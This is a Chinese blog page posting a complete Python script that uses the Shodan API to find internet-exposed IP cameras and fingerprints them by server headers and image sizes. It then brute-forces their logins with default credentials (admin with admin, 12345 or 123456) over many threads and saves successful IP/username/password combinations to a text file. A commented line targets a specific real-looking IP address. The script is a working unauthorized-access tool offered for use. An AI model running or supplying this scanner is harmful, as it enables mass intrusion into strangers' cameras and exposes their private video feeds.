2. 程式人生 > >shodan 收索網路攝像頭

shodan 收索網路攝像頭

阿新 發佈:2018-11-09

通過shodan 收索網路攝像頭,進行弱密碼判斷,如何登陸成功,會寫入文字中

#coding=utf-8
import shodan

import requests
import base64
import threading
import Queue
import time

q=Queue.Queue()
ipQ=Queue.Queue()
lock=threading.Lock()
saveFilename='ip_uname_pwd.txt'
key = ''#填寫自己api

def shodanSearch(keywords,key):
    SHODAN_API_KEY = key
    api = shodan.Shodan(SHODAN_API_KEY)
    iplist = []
    try
 
:
        results = api.search(keywords)
        for result in results['matches']:
            #print result
            ip_port=result['ip_str']+":"+str(result['port'])
            iplist.append(ip_port)
        return iplist
    except shodan.APIError, e:
        print 'Error: %s' % e
        return
 
 []



class MyThread(threading.Thread):
    def __init__(self,func):
        threading.Thread.__init__(self)
        self.func=func
    def run(self):
        self.func()
def isDiffVersion(ip):
    # return -1 獲取失敗 0 紅色 1 攝像頭和白色
    url = "http://%s" % ip

    try:
        r = requests.head(url, timeout=5
 
)
        print  r.status_code

        print r.headers['Server']
    except:
        return -1
    print url + '  ',
    if r.status_code==401:
        print "401 Unauthorized"
        return 2
    if r.headers['Server']=='DNVRS-Webs':
        try:
            url = "http://%s/doc/images/login/login_14.png" % ip
            r=requests.head(url,timeout=3)
            #print r.headers
            if r.headers['Content-Length']=='80144':
                print "紅色"
                return 0
            else:
                try:
                    url = "http://%s/doc/ui/images/login.jpg" % ip
                    r = requests.head(url, timeout=3)
                    #print r.headers
                    if r.headers['Content-Length'] == '102383':
                        print "攝像頭"
                        return 1
                except:
                    pass
        except :
            pass
    elif r.headers['Server'] == 'App-webs/':
        try:
            url = "http://%s/doc/ui/images/login.jpg" % ip
            r = requests.head(url, timeout=3)
            #print r.headers
            if r.headers['Content-Length'] == '102383':
                print "攝像頭"
                return 1
            else:
                try:
                    url = "http://%s/doc/images/login/login_left.gif" % ip
                    r = requests.head(url, timeout=3)
                    #print r.headers
                    if  r.headers['Content-Length'] == '15256':
                        print "白色"
                        return 1
                except:
                    pass
        except:
            pass

    print "|"
    return -1


def isLoginType0(ajax_url,username,password):
    #username = 'admin'
    #password = '12345'
    m_szUserPwdValue = base64.encodestring(username + ":" + password).strip("\n\r")
    headers = {
        "If-Modified-Since": "0",
        "Authorization": "Basic %s" % m_szUserPwdValue
    }
    #print headers
    try:
        print ajax_url+ '   ',
        r = requests.get(ajax_url, headers=headers,timeout=3)
        print str(r.status_code) + '   ',
        content = r.text
        r.close()
        #print content
        if content.find('Sign in') != -1 :
            print "YES!"
            return '1', username, password
        elif content.find(u'觀看視訊') != -1 :
            print "YES!"
            return '1', username, password
        elif content.find('video') != -1 :
            print "YES!"
            return '1', username, password
        elif content.find('IP_Camera') != -1:
            print "YES!"
            return '1', username, password
        elif content.find('200') == -1 :
            print "NO!"
            return '-1',username,password
        else:
            print "YES!"
            return '1',username,password

    except Exception as e:
        print "timeout "
        return '0',username,password

def isLoginType1(ajax_url,username,password):

    #username = 'admin'
    #password = '12345'
    timeStamp = int(time.time() * 1000)
    url = 'http://%s:%[email protected]%s?timeStamp=%d' % (username, password,ajax_url.lstrip("http://"),timeStamp)
    print url
    try:
        r=requests.get(url,timeout=3)

    except Exception as e:
        return '0',username,password
    print str(r.status_code) + ' ',
    content = r.text
    r.close()
    #print content
    if content.find('200') == -1:
        print "NO!"
        return '-1',username,password
    else:
        print "YES!"
        return '1',username,password
def writeFile(filename,data):
    f=open(filename,'a+')
    f.write(data+"\r\n")
    f.close()
def isLoginSuccess(ajax_url,serverType,uname,pwd):
    if serverType in [0,2]:
        result,username,password=isLoginType0(ajax_url,uname,pwd)
    else:
        result,username,password=isLoginType1(ajax_url,uname,pwd)
    if result=='1':
        lock.acquire()
        writeFile(saveFilename,ajax_url+'---'+username+'---'+password)
        lock.release()
def do_work():
    while True:
        item=q.get()
        ajax_url=item['ajax_url']
        serverType=item['type']
        uname=item['uname']
        pwd=item['pwd']
        isLoginSuccess(ajax_url,serverType,uname,pwd)
        q.task_done()

def rank():
    #這裡選擇搜尋的關鍵字,四種選擇
    #DNVRS-Webs
    #App-webs/
    #index.html ipcam
    #Basic realm="IP Camera" country:CN

    iplist = shodanSearch('IP Camera', key)
    print len(iplist)
    for ip_port in iplist:
        ipQ.put(ip_port)
def do_DiffVersion():
    while not ipQ.empty():
        ip=ipQ.get()
        result=isDiffVersion(ip)
        if result in [0,1]:
            for pwd in ['admin', '12345','123456']:
                item={}
                item['ajax_url']='http://%s/ISAPI/Security/userCheck' % ip
                item['type']=result
                item['uname'] = 'admin'
                item['pwd']=pwd
                q.put(item)
        elif result in [2]:
            for pwd in ['admin', '12345','123456']:
                item={}
                item['ajax_url']='http://%s' % ip
                item['type']=result
                item['uname'] = 'admin'
                item['pwd']=pwd
                q.put(item)
        ipQ.task_done()
if __name__ == "__main__":

    #isLoginType0('http://87.202.163.103:8000','admin','admin')
    #input("xx")
    date=time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
    writeFile(saveFilename,"#################%s#################"%date)
    rank()
    for i in range(10):
        thread = MyThread(do_DiffVersion)
        thread.setDaemon(True)
        thread.start()
    for i in range(10):
        thread=MyThread(do_work)
        thread.setDaemon(True)
        thread.start()


    ipQ.join()
    q.join()

相關推薦

shodan 網路攝像頭

通過shodan 收索網路攝像頭,進行弱密碼判斷,如何登陸成功,會寫入文字中 #coding=utf-8 import shodan import requests import base64 import threading import Queue import time q=Q

自定義View

clear string strong enter traints tro targe property tco 1 .h文件 @interface SearchNavView : UIView @property (nonatomic, copy) void(^canc

Kali學習筆記7:SHODAN引擎

isp Go 6.2 www. image try 域名 主機 httpd SHODAN搜索引擎不像百度谷歌等,它們爬取的是網頁,而SHODAN搜索的是設備。 物聯網使用過程中,通常容易出現安全問題,如果被黑客用SHODAN搜索到,後果不堪設想。 網站:https://

在ROS中使用usb網路攝像頭(usb_cam,Arch linux,ROS JADE)

如題,在做香蕉派的影象處理時需要用到usb_cam這個ros node,在ubuntu上驗證之後,打算移植到Banana Pi的Archlinux ARM的時候卻發現了一個問題:不像ubuntu可以直接apt-get到,在Arch上不論pacman還是yaourt上都搜不到這個包。無奈,

使用ONVIF Device Test Tool獲取網路攝像頭的音/視訊

軟/硬體準備 1、一個網路攝像頭(IPC),品牌必須支援ONVIF協議,具體哪些品牌支援不作為本教程介紹的重點,大家可自行度娘,我知道的有品牌大華和海康威視; 2、ONVIF Device Test Tool軟體下載,筆者使用的版本為15.06, 下載地址:https://downl

RTSP協議轉換RTMP協議,直播網路攝像頭

  RTSP協議也是廣泛使用的直播/點播流媒體協議,以前的專案裡實現了一個RTSP協議轉換RTMP直播協議的程式,為的是可以接收遠端裝置或伺服器的多路RTSP直播資料,實時轉換為RTMP直播協議,推送到NginxRtmp等RTMP伺服器,可以在PC上實現flash觀看RTSP直播源(比如IP

Opencv讀取USB網路攝像頭無法顯示,影象為空,顯示黑色?

利用Opencv讀取電腦的攝像頭,程式碼如下,一直無法正常執行,搜尋網上的解決方案,均未解決。程式碼語法沒有錯誤,攝像頭也可以開啟,但是就是無法讀取當前幀影象 #include <opencv.hpp> using namespace cv; int main() { Vid

python+opencv 開啟網路攝像頭

# -*- coding: utf-8 -*- """ Created on Thu Nov 22 18:41:33 2018 #QQ群:476842922(歡迎加群討論學習 @author: Administrator """ #以下是最常用的讀取視訊流的方法 import cv2 url

Ubuntu16.04和Windows10下直接用網線連線海康威視網路攝像頭

一. ubuntu 1.獲取網路攝像頭IP地址 例如 192.168.2.64 2.設定Ubuntu網路連線 電腦聯網狀態下終端輸入 nmcli dev show 記下IPV4地址,IPV4閘道器,IPV4.DNS地址 桌面右上角網路-》乙太網-》增加-》乙太網-》新建

配置海康威視網路攝像頭動態庫方法

如果HCNetSDKCom目錄以及libhcnetsdk.so、libhpr.so、libHCCore檔案和可執行檔案在同一級目錄下,則使用同級目錄下的庫檔案; 如果不在同一級目錄下,則需要將以上檔案的目錄載入到動態庫搜尋路徑中,設定的方式有以下幾種: 一. 將網路SDK各動態庫路徑加入到L

Ajax非同步表單簡單實現功能

非同步收索的作用簡單來說就是:在不更新整個網頁的情況下更新你想改變的網頁某個部分。   下面是實現: 1.準備工作     在mvc5 中要用Ajax,首先要新增jQuery的Ajax檔案。方法:右擊專案--管理NuGet程式包--查詢jQuery--找到關於Ajax的,然後

QML播放本地視訊或網路攝像頭視訊

 (1)利用定時器,通過採集影象的方式  Image{        id:img        Timer{    &n

史上最全的基於ffmpeg+sdl網路攝像頭編解碼播放資料(包含交叉編譯過程,附帶完整原始碼)

原創博文,嚴禁私自轉載,轉載請註明出處!!! 近期,由於工作需要,要在開發板上跑一個攝像頭,攝像頭款式比較老,不支援rtsp格式,所以選擇編譯ffmpeg+sdl實現軟解碼播放攝像頭,特此記錄整個編譯過程(非常之艱辛,發文留念) 在ubuntu上交叉編譯環境的搭建:因為開發板上搭建的程式的執

ros indigo opencv獲取網路攝像頭報錯(尚未解決)

[h264 @ 0x7f928c5deca0] cabac decode of qscale diff failed at 46 48 [h264 @ 0x7f928c5deca0] error while decoding MB 46 48, bytestre

docker、下載、啟動、使用映象

例項   1. 查詢 docker search sybase 2. 下載 docker pull ifnazar/sybase_15_7 3. 刪除映象 docker rmi -f runoob/ubuntu:v4 4. 檢視所有映象 docker

【OpenCV 】 網路攝像頭

 1  RTSP   RTSP (Real Time Streaming Protocol),是一種語法和操作類似 HTTP 協議,專門用於音訊和視訊的應用層協議。 和 HTTP 類似,RTSP 也使用 URL 地址。   海康網路攝像頭的 RTSP URL 格式如下:

(5906171){小雅}四大搜網路推廣

沒有最好的,只有合適的。推廣要根據自己行業特點,以及自己的預算來衡量。小雅【wnn532】簡單總結一下推廣方式,可以作為參考。 1、利用搜索引擎進行推廣 搜尋引擎是網際網路的一大奇蹟,它使瀏覽者可以方便地在網際網路這個資訊大海洋中找到自己所需的資訊,也給資訊提供

使用USB網路攝像頭和ROS跟蹤ArUco Markers

前言 在實際應用中,在環境中部署下圖所示的Markers,可以輔助機器人進行定位,彌補單一感測器的缺陷,糾正誤差等。 相關資料 ArUco library OpenCV中的aruco module,中文翻譯 http://sauravag.com/2015/03

openCV 呼叫網路攝像頭或本地攝像頭

openCV 呼叫網路攝像頭 所需要硬體及軟體環境 python3.6,一個網路攝像頭,openCV, # -*- coding: utf-8 -*- # @author leone # @desc 使用 python 的 openCV 獲取網路攝像頭的資料 # @version 2018-12-2

openCV 呼叫網路攝像頭

所需要硬體及軟體環境 python3.6,一個網路攝像頭,openCV, # -*- coding: utf-8 -*- # @author leone # @desc 使用 python 的 openCV 獲取網路攝像頭的資料 # @version 2018-12-23